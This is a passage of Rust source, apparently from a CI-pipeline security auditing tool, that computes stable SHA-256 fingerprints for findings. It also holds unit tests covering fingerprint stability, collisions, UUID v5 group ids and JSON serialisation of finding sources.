687/// * Finding category (snake_case)
688/// * Root-authority node name — Secret/Identity name when one is
689/// involved, empty string otherwise. Surfaces the credential identity
690/// in the SIEM context column without being the only differentiator.
691/// * Ordered involved-node names — every node in `nodes_involved`,
692/// joined in original order (preserves caller intent so per-hop
693/// findings against the same secret produce distinct fingerprints).
694///
695/// **Inputs (insensitive to):**
696/// * Wall-clock time
697/// * The finding's `message` text — operators tweak phrasing without
698/// wanting suppressions to break
699/// * `taudit` version string
700/// * Environment / host / cwd
701/// * Pipeline file content hash — only the path matters
702///
703/// Stability guarantee: the v2 algorithm is stable for the v0.10+ line.
704/// Pre-v0.10 (v1 algorithm) suppressions DO NOT carry forward — a one-time
705/// re-baselining is required when upgrading. CHANGELOG and
706/// `docs/finding-fingerprint.md` flag the break explicitly.
707///
708/// Output: SHA-256 of the canonical input string, truncated to the first
709/// 16 hex characters (64 bits — collision-resistant enough for finding
710/// dedup, short enough to be human-glanceable in a SIEM table).
711pub fn compute_fingerprint(finding: &Finding, graph: &AuthorityGraph) -> String {
712 let rule_id = extract_custom_rule_id(&finding.message)
713 .map(str::to_string)
714 .unwrap_or_else(|| category_rule_id(&finding.category));
715
716 let category = category_rule_id(&finding.category);
717 let file = graph.source.file.as_str();
718
719 // Root authority name (if any) — always emitted as its own component,
720 // empty string when no Secret/Identity is involved. Distinct field so
721 // a finding whose root_authority differs from a sibling's is
722 // recognisably different even when the involved-node list happens to
723 // overlap.
724 let root_authority: String = finding
725 .nodes_involved
726 .iter()
727 .filter_map(|id| graph.node(*id))
728 .find(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
729 .map(|n| n.name.clone())
730 .unwrap_or_default();
731
732 // Ordered involved-node names. Order is preserved (NOT sorted) — for
733 // authority_propagation findings the convention is `[source, sink]`,
734 // so two findings hitting the same secret but reaching different
735 // untrusted steps produce different fingerprints (the v1 collision
736 // class). Empty string when no nodes are involved.
737 let nodes_ordered: String = finding
738 .nodes_involved
739 .iter()
740 .filter_map(|id| graph.node(*id))
741 .map(|n| n.name.as_str())
742 .collect::<Vec<_>>()
743 .join(",");
744
745 // Canonical encoding: every component prefixed with a tag and joined
746 // by `\x1f` (ASCII unit separator) so component boundaries cannot
747 // alias across inputs. Algorithm version baked into the prefix so a
748 // future change to the contract is detectable from the canonical
749 // string alone.
750 let canonical = format!(
751 "v2\x1frule={rule_id}\x1ffile={file}\x1fcategory={category}\x1froot={root_authority}\x1fnodes={nodes_ordered}"
752 );
753
754 let digest = Sha256::digest(canonical.as_bytes());
755 let mut out = String::with_capacity(16);
756 for byte in &digest[..8] {
757 use std::fmt::Write;
758 // 8 bytes -> 16 hex chars
759 let _ = write!(&mut out, "{byte:02x}");
760 }
761 out
762}
763
764#[cfg(test)]
765mod fingerprint_tests {
766 use super::*;
767 use crate::graph::{AuthorityGraph, NodeKind, PipelineSource, TrustZone};
768
769 fn source(file: &str) -> PipelineSource {
770 PipelineSource {
771 file: file.to_string(),
772 repo: None,
773 git_ref: None,
774 commit_sha: None,
775 }
776 }
777
778 fn make_finding(category: FindingCategory, msg: &str, nodes: Vec<NodeId>) -> Finding {
779 Finding {
780 severity: Severity::High,
781 category,
782 path: None,
783 nodes_involved: nodes,
784 message: msg.to_string(),
785 recommendation: Recommendation::Manual {
786 action: "fix it".to_string(),
787 },
788 source: FindingSource::BuiltIn,
789 extras: FindingExtras::default(),
790 }
791 }
792
793 #[test]
794 fn fingerprint_is_stable_across_repeat_calls() {
795 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
796 let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
797 let f = make_finding(
798 FindingCategory::AuthorityPropagation,
799 "AWS_KEY reaches third party",
800 vec![s],
801 );
802 let a = compute_fingerprint(&f, &graph);
803 let b = compute_fingerprint(&f, &graph);
804 assert_eq!(a, b, "same finding must hash identically across calls");
805 assert_eq!(a.len(), 16, "fingerprint is 16 hex chars");
806 assert!(a.chars().all(|c| c.is_ascii_hexdigit()));
807 }
808
809 #[test]
810 fn different_files_produce_different_fingerprints() {
811 let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
812 let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
813 let s_a = g_a.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
814 let s_b = g_b.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
815 let f_a = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_a]);
816 let f_b = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_b]);
817 assert_ne!(
818 compute_fingerprint(&f_a, &g_a),
819 compute_fingerprint(&f_b, &g_b)
820 );
821 }
822
823 #[test]
824 fn different_rules_produce_different_fingerprints() {
825 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
826 let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
827 let f1 = make_finding(FindingCategory::AuthorityPropagation, "msg", vec![s]);
828 let f2 = make_finding(FindingCategory::UntrustedWithAuthority, "msg", vec![s]);
829 assert_ne!(
830 compute_fingerprint(&f1, &graph),
831 compute_fingerprint(&f2, &graph)
832 );
833 }
834
835 #[test]
836 fn message_changes_do_not_affect_fingerprint() {
837 // The whole point of cross-run dedup: an operator can re-word
838 // the message text without breaking SIEM suppressions.
839 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
840 let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
841 let f1 = make_finding(
842 FindingCategory::AuthorityPropagation,
843 "old phrasing of the message",
844 vec![s],
845 );
846 let f2 = make_finding(
847 FindingCategory::AuthorityPropagation,
848 "completely different new phrasing",
849 vec![s],
850 );
851 assert_eq!(
852 compute_fingerprint(&f1, &graph),
853 compute_fingerprint(&f2, &graph)
854 );
855 }
856
857 #[test]
858 fn per_hop_findings_against_same_authority_are_distinct() {
859 // v2 contract: a single secret reaching N distinct untrusted steps
860 // produces N distinct fingerprints. Each (secret, step) pair is its
861 // own remediation-distinct finding — collapsing them (the v1
862 // behaviour) hid genuinely different exposure surfaces. SIEMs that
863 // want a per-secret rollup can group on root_authority client-side.
864 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
865 let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
866 let step_a = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
867 let step_b = graph.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
868
869 let f_a = make_finding(
870 FindingCategory::AuthorityPropagation,
871 "DEPLOY_TOKEN reaches deploy[0]",
872 vec![secret, step_a],
873 );
874 let f_b = make_finding(
875 FindingCategory::AuthorityPropagation,
876 "DEPLOY_TOKEN reaches deploy[1]",
877 vec![secret, step_b],
878 );
879 assert_ne!(
880 compute_fingerprint(&f_a, &graph),
881 compute_fingerprint(&f_b, &graph),
882 "per-hop findings against one secret must produce distinct \
883 fingerprints — sink identity is part of the issue"
884 );
885 }
886
887 #[test]
888 fn same_secret_same_sink_remains_stable_across_calls() {
889 // Re-running the SAME finding (same secret, same sink, same file)
890 // must still produce the same fingerprint — that is the entire
891 // point of cross-run dedup. The v2 change adds inputs but does not
892 // introduce non-determinism.
893 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
894 let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
895 let step = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
896 let f = make_finding(
897 FindingCategory::AuthorityPropagation,
898 "msg",
899 vec![secret, step],
900 );
901 assert_eq!(
902 compute_fingerprint(&f, &graph),
903 compute_fingerprint(&f, &graph)
904 );
905 }
906
907 #[test]
908 fn r2_attack2_two_files_same_secret_name_distinct_fingerprints() {
909 // R2 attack #2 reproducer: two genuinely different findings in two
910 // different pipeline files that share a secret NAME must produce
911 // different fingerprints. The earlier (pre-v0.9.1) algorithm could
912 // collide here; the v2 algorithm explicitly includes file path so
913 // the names cannot alias across files.
914 let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
915 let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
916 let s_a = g_a.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
917 let sink_a = g_a.add_node(NodeKind::Step, "evil/action", TrustZone::Untrusted);
918 let s_b = g_b.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
919 let sink_b = g_b.add_node(
920 NodeKind::Step,
921 "different-evil/action",
922 TrustZone::Untrusted,
923 );
924
925 let f_a = make_finding(
926 FindingCategory::AuthorityPropagation,
927 "MY_SECRET reaches evil/action",
928 vec![s_a, sink_a],
929 );
930 let f_b = make_finding(
931 FindingCategory::AuthorityPropagation,
932 "MY_SECRET reaches different-evil/action",
933 vec![s_b, sink_b],
934 );
935 assert_ne!(
936 compute_fingerprint(&f_a, &g_a),
937 compute_fingerprint(&f_b, &g_b),
938 "two genuinely different findings must not share a fingerprint \
939 just because the secret name overlaps"
940 );
941 }
942
943 #[test]
944 fn root_authority_segment_is_always_present_even_when_empty() {
945 // Findings without any Secret/Identity (e.g. floating_image) MUST
946 // still produce a stable fingerprint. The empty-root case is its
947 // own equivalence class — two such findings with the same node
948 // list collapse to the same fingerprint; differing node lists
949 // produce different fingerprints.
950 let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
951 let img_a = g.add_node(NodeKind::Image, "alpine:latest", TrustZone::ThirdParty);
952 let img_b = g.add_node(NodeKind::Image, "ubuntu:22.04", TrustZone::ThirdParty);
953 let f_a = make_finding(FindingCategory::FloatingImage, "msg-a", vec![img_a]);
954 let f_b = make_finding(FindingCategory::FloatingImage, "msg-b", vec![img_b]);
955 let fp_a = compute_fingerprint(&f_a, &g);
956 let fp_b = compute_fingerprint(&f_b, &g);
957 assert_ne!(
958 fp_a, fp_b,
959 "two distinct floating-image findings must not collide"
960 );
961 assert_eq!(fp_a.len(), 16);
962 assert_eq!(fp_b.len(), 16);
963 }
964
965 #[test]
966 fn node_order_is_significant() {
967 // The fingerprint preserves caller order in nodes_involved. A
968 // finding emitted as [secret, step] is semantically different from
969 // [step, secret] (source vs sink role) and produces a different
970 // fingerprint. Rules must therefore stay consistent in the order
971 // they push nodes — every built-in does today.
972 let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
973 let s = g.add_node(NodeKind::Secret, "K", TrustZone::FirstParty);
974 let step = g.add_node(NodeKind::Step, "use", TrustZone::Untrusted);
975 let forward = make_finding(FindingCategory::AuthorityPropagation, "x", vec![s, step]);
976 let reverse = make_finding(FindingCategory::AuthorityPropagation, "x", vec![step, s]);
977 assert_ne!(
978 compute_fingerprint(&forward, &g),
979 compute_fingerprint(&reverse, &g),
980 "node order must influence the fingerprint so role swap is detectable"
981 );
982 }
983
984 #[test]
985 fn custom_rule_id_in_message_is_used() {
986 // Custom rules carry id in `[id] message` prefix; fingerprint
987 // must key on the custom id, not the category fallback.
988 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
989 let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
990 let f_custom = make_finding(
991 FindingCategory::UnpinnedAction,
992 "[my_custom_rule] something happened",
993 vec![s],
994 );
995 let f_plain = make_finding(FindingCategory::UnpinnedAction, "no prefix here", vec![s]);
996 assert_ne!(
997 compute_fingerprint(&f_custom, &graph),
998 compute_fingerprint(&f_plain, &graph),
999 "custom rule id must distinguish from category fallback"
1000 );
1001 }
1002
1003 #[test]
1004 fn finding_group_id_is_deterministic_uuid_v5() {
1005 // Same fingerprint -> same group id, byte-identical.
1006 let g1 = compute_finding_group_id("5edb30f4db3b5fa3");
1007 let g2 = compute_finding_group_id("5edb30f4db3b5fa3");
1008 assert_eq!(g1, g2);
1009 // UUID v5 shape: 8-4-4-4-12 hex chars with version=5 nibble.
1010 assert_eq!(g1.len(), 36);
1011 // Position 14 is the version nibble — must be '5' for v5.
1012 assert_eq!(
1013 g1.chars().nth(14),
1014 Some('5'),
1015 "expected v5 marker, got {g1}"
1016 );
1017 // Position 19 is the variant nibble — must be one of 8/9/a/b.
1018 let variant = g1.chars().nth(19).unwrap();
1019 assert!(
1020 matches!(variant, '8' | '9' | 'a' | 'b'),
1021 "expected RFC 4122 variant, got {variant}"
1022 );
1023 // Different fingerprint -> different group id.
1024 assert_ne!(g1, compute_finding_group_id("a3c8d9e1f2b4c5d6"));
1025 }
1026
1027 #[test]
1028 fn with_time_to_fix_attaches_effort() {
1029 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1030 let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
1031 let f = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s])
1032 .with_time_to_fix(FixEffort::Trivial);
1033 assert_eq!(f.extras.time_to_fix, Some(FixEffort::Trivial));
1034 }
1035
1036 #[test]
1037 fn with_compensating_control_downgrades_and_records_original() {
1038 let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1039 let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
1040 let f = make_finding(FindingCategory::TriggerContextMismatch, "msg", vec![s])
1041 .with_compensating_control("fork check present");
1042 // Default High in make_finding -> downgraded to Medium.
1043 assert_eq!(f.severity, Severity::Medium);
1044 assert_eq!(f.extras.original_severity, Some(Severity::High));
1045 assert_eq!(f.extras.compensating_controls.len(), 1);
1046 }
1047
1048 #[test]
1049 fn empty_node_list_still_produces_fingerprint() {
1050 // Categories like authority_cycle, floating_image, unpinned_action
1051 // may not carry an authority node — fingerprint must still work.
1052 let graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1053 let f = make_finding(FindingCategory::UnpinnedAction, "no nodes here", vec![]);
1054 let fp = compute_fingerprint(&f, &graph);
1055 assert_eq!(fp.len(), 16);
1056 assert!(fp.chars().all(|c| c.is_ascii_hexdigit()));
1057 }
1058}
1059
1060#[cfg(test)]
1061mod source_tests {
1062 use super::*;
1063
1064 #[test]
1065 fn built_in_serializes_as_string() {
1066 let s = FindingSource::BuiltIn;
1067 let v = serde_json::to_value(&s).unwrap();
1068 assert_eq!(v, serde_json::json!("built-in"));
1069 }
1070
1071 #[test]
1072 fn custom_serializes_with_path_payload() {
1073 let s = FindingSource::Custom {
1074 source_file: PathBuf::from("/policies/no_prod_pat.yml"),
1075 };
1076 let v = serde_json::to_value(&s).unwrap();
1077 assert_eq!(
1078 v,
1079 serde_json::json!({"custom": {"source_file": "/policies/no_prod_pat.yml"}})
1080 );
1081 }
1082
1083 #[test]
1084 fn finding_round_trip_preserves_built_in_source() {
1085 let f = Finding {
1086 severity: Severity::High,
1087 category: FindingCategory::AuthorityPropagation,
1088 path: None,
1089 nodes_involved: vec![],
1090 message: "x".into(),
1091 recommendation: Recommendation::Manual {
1092 action: "fix".into(),
1093 },
1094 source: FindingSource::BuiltIn,
1095 extras: FindingExtras::default(),
1096 };
1097 let s = serde_json::to_string(&f).unwrap();
1098 // Encoded as the literal `"source":"built-in"` — operators eyeballing
1099 // raw JSON immediately see "this is a shipped rule".
1100 assert!(
1101 s.contains("\"source\":\"built-in\""),
1102 "built-in source must serialise as \"built-in\": {s}"
1103 );
1104 let f2: Finding = serde_json::from_str(&s).unwrap();
1105 assert_eq!(f2.source, FindingSource::BuiltIn);
1106 }
1107
1108 #[test]
1109 fn finding_round_trip_preserves_custom_source_with_path() {
1110 let path = PathBuf::from("/work/invariants/no_prod_pat.yml");
1111 let f = Finding {
1112 severity: Severity::Critical,
1113 category: FindingCategory::AuthorityPropagation,
1114 path: None,
1115 nodes_involved: vec![],
1116 message: "[no_prod_pat] hit".into(),
1117 recommendation: Recommendation::Manual {
1118 action: "fix".into(),
1119 },
1120 source: FindingSource::Custom {
1121 source_file: path.clone(),
1122 },
1123 extras: FindingExtras::default(),
1124 };
1125 let s = serde_json::to_string(&f).unwrap();
1126 assert!(
1127 s.contains("\"custom\""),
1128 "custom source must serialise with `custom` key: {s}"
1129 );
1130 assert!(
1131 s.contains("/work/invariants/no_prod_pat.yml"),
1132 "custom source must include the loader path: {s}"
1133 );
1134 let f2: Finding = serde_json::from_str(&s).unwrap();
1135 assert_eq!(
1136 f2.source,
1137 FindingSource::Custom { source_file: path },
1138 "round-trip must preserve custom source path"
1139 );
1140 }
1141
1142 #[test]
1143 fn missing_source_field_deserializes_as_built_in() {
1144 // Backward-compat: pre-provenance JSON omits the field entirely; the
1145 // serde default makes it `BuiltIn`. Without this, every old
1146 // suppression DB would fail to parse on upgrade.
1147 let json = r#"{
1148 "severity": "high",
1149 "category": "authority_propagation",
1150 "nodes_involved": [],
1151 "message": "old-format finding",
1152 "recommendation": {"type": "manual", "action": "review"}
1153 }"#;
1154 let f: Finding = serde_json::from_str(json).expect("legacy JSON must parse");
1155 assert_eq!(f.source, FindingSource::BuiltIn);
1156 }
1157}